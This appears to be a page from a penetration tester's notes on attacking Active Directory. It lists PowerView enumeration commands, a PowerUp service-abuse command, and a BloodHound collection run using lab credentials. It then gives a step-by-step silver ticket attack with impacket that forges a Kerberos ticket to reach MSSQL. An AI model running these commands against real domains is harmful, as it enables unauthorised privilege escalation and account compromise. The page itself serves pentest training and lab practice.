Methodology

This Page shows the Complete methodology for Active Directory Pentesting

Enumerating AD Environment

PowerView Enumerating Basic Stuff

Enumerate AD Users

Only Get-DomainUser command will print very Long info so you can use below command to filter just the usernames 

Get-DomainUser | select -ExpandProperty samaccountname

Enumerating AD Computers

This command will get all of the computer names in the Domain.

Get-DomainComputer | select -ExpandProperty dnshostname

Enumerating Domain Admins Group

Get-DomainGroup -Identity "Domain Admins"

Enumerating Domain Admins Group Members

Get-DomainGroupMember -Identity "Domain Admins"

Enumerating Enterprise Admins Group Members

Get-DomainGroupMember -Identity "Enterprise Admins"
#We need to query the root domain as Enterprise Admins group is present only in the root of a forest.
Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local

PowerView Enumerating Advanced

Enumerating ACL's

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "USERNAME HERE"}

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "GROUP NAME HERE"}

Enumerating Organizational Unit (OU)

Get-DomainOU | select -ExpandProperty name
#Now, to list all the computers in the DevOps OU:
(Get-DomainOU -Identity DevOps).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

Powerup.ps1

To Invoke any abuse function with your own username you can use below command.

Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'DOMAIN\USERNAME' -Verbose

Bloodhound

We can use bloodhound to enumerate the domain if we have a valid set of credentials, we can use bloodhound.py kali linux script to do some enumeration

 bloodhound-python --dns-tcp -ns 10.10.179.143 -d klendathu.vl -u 'zim' -p 'football22' -c all

Silver Ticket Attack

In a silver ticket attack, the attacker can forge a valid TGS (Ticket granting Service) and then attacker can access that service using that TGS.

For this attack we need the NTLM hash of the service account user. for this we can use online tools, or below python code

# Below code will give NTLM Hash of test1234
import hashlib,binascii
hash = hashlib.new('md4', "test1234".encode('utf-16le')).digest();
print(binascii.hexlify(hash));

For Domain SID we can use 

# Below command will print the Domain SID
impacket-lookupsid domain/username:[email protected]

now we have both NTLM hash and the Domain SID so we can craft the Silver Ticket Attack, for this i like to use Impacket-ticketer

impacket-ticketer -spn MSSQLSvc/srv1.klendathu.vl -domain klendathu.vl -domain-sid S-1-5-21-641890747-1618203462-755025521 -nthash E2F156A20FA3AC2B16768F8ADD53D72C administrator

this will create a administrator.ccache file

#export the ticker
export KRB5CCNAME=administrator.ccache

# then use this ticket to access any service like MSSQL

impacket-mssqlclient -k -no-pass <domain name or subdomain>

#e.g

impacket-mssqlclient -k -no-pass SRV1.Klendathu.vl

Previous5000 - Pentesting Docker RegistryNextHydra

Last updated